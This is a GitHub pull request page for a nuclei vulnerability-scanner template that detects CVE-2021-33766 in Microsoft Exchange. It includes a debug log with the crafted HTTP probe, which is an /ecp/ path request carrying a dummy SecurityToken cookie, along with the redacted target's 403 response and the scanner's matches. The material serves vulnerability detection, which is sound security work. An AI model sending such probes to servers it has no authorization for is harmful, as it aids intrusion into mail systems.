Skip to content

Add CVE-2021-33766 (KEV and vKEV) #13547

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 3 commits into from
Oct 12, 2025
Merged

Add CVE-2021-33766 (KEV and vKEV) #13547

merged 3 commits into from
Oct 12, 2025

Conversation

@daffainfo
Copy link
Contributor

@daffainfo daffainfo commented Oct 10, 2025

Template / PR Information

Microsoft Exchange Server Information Disclosure Vulnerability

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2021-33766] Dumped HTTP request for https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false

GET /ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Cookie: SecurityToken=x
Accept-Encoding: gzip

[DBG] [CVE-2021-33766] Dumped HTTP response https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Thu, 09 Oct 2025 16:28:38 GMT
X-Ecp-Error: Microsoft.Exchange.Data.Storage.ObjectNotFoundException
...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- Copyright (c) 2007 Microsoft Corporation.  All rights reserved. -->
<!-- {6DD23A7E-5C94-4d52-B537-2EA53079B2D5} -->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="zh-CN">

        <head id="Head1"><meta http-equiv="Content-Type" content="text/html;&#32;CHARSET=utf-8" /><meta content="MSHTML&#32;6.00.5730.11" name="GENERATOR" />
                <link rel="shortcut icon" href="/ecp/15.1.1847.3/themes/default/favicon.ico" type="image/x-icon" />
        <link href="/ecp/15.1.1847.3/themes/default/main_zhs.css" type="text/css" rel="stylesheet" /><title>
        Outlook - 注销
</title></head>

        <body scroll="no">
        <div class="errorMainDiv">
            <img class="&#32;CommonSprite&#32;OutlookLogo" title="Outlook" src="/ecp/15.1.1847.3/themes/default/clear1x1.gif" alt="Outlook" />

            <div class="errorMessageContainer">
                <div class="errorHeader"><span id="msgCode">403</span></div>
                <div class="errorSubHeader"><span id="msgTitle">&#25298;&#32477;&#35775;&#38382; :(</span></div>
                <div class="errorDetails">
                    <div class="errorMsg">您必须登录到您的帐户才能打开此页面。如果您没有此 Microsoft 服务的帐户,请联系您的电子邮件管理员。</div>
                    
                </div>

                <!-- cause:{FEE4FCBB-25E7-4e14-95CA-015FE48F44F1} -->
            </div>

            <div class="errorFooter">
                <img class="&#32;CommonSprite&#32;OfficeLogo" title="Office" src="/ecp/15.1.1847.3/themes/default/clear1x1.gif" alt="Office" />
            </div>
        </div>
        <script>
            function signOut() {
                var url =
                    window.location.protocol +
                    "//" +
                    window.location.hostname +
                    ((window.location.port == "") ? "" : ":" + window.location.port) +
                    "";

                window.location.href = "logoff.aspx?src=exch&url=" + url;
            }

            function showHideMoreInfo() {
                var moreInfo = document.getElementById("moreInfo");
                if (moreInfo.style.display == "none")
                    moreInfo.style.display = "block";
                else
                    moreInfo.style.display = "none";
            }
        </script>
        </body>
</html>
[CVE-2021-33766:word-1] [http] [high] https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false
[CVE-2021-33766:word-2] [http] [high] https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false
[CVE-2021-33766:status-3] [http] [high] https://REDACTED/ecp/[email protected]/PersonalSettings/HomePage.aspx?showhelp=false
[INF] Scan completed in 580.681083ms. 3 matches found.

@daffainfo
Copy link
Contributor Author

daffainfo commented Oct 10, 2025

Reopen #13532

@github-actions github-actions bot requested a review from ritikchaddha October 10, 2025 11:03
@ritikchaddha ritikchaddha merged commit 4fbb251 into projectdiscovery:main Oct 12, 2025
3 checks passed
@algora-pbc
Copy link

algora-pbc bot commented Oct 22, 2025

🎉🎈 @daffainfo has been awarded $200 by ProjectDiscovery! 🎈🎊

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@ritikchaddha ritikchaddha ritikchaddha approved these changes

Assignees

@Akokonunes Akokonunes

Labels

Done Ready to merge Hacktoberfest 💰 Rewarded

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@daffainfo @ritikchaddha @DhiyaneshGeek @Akokonunes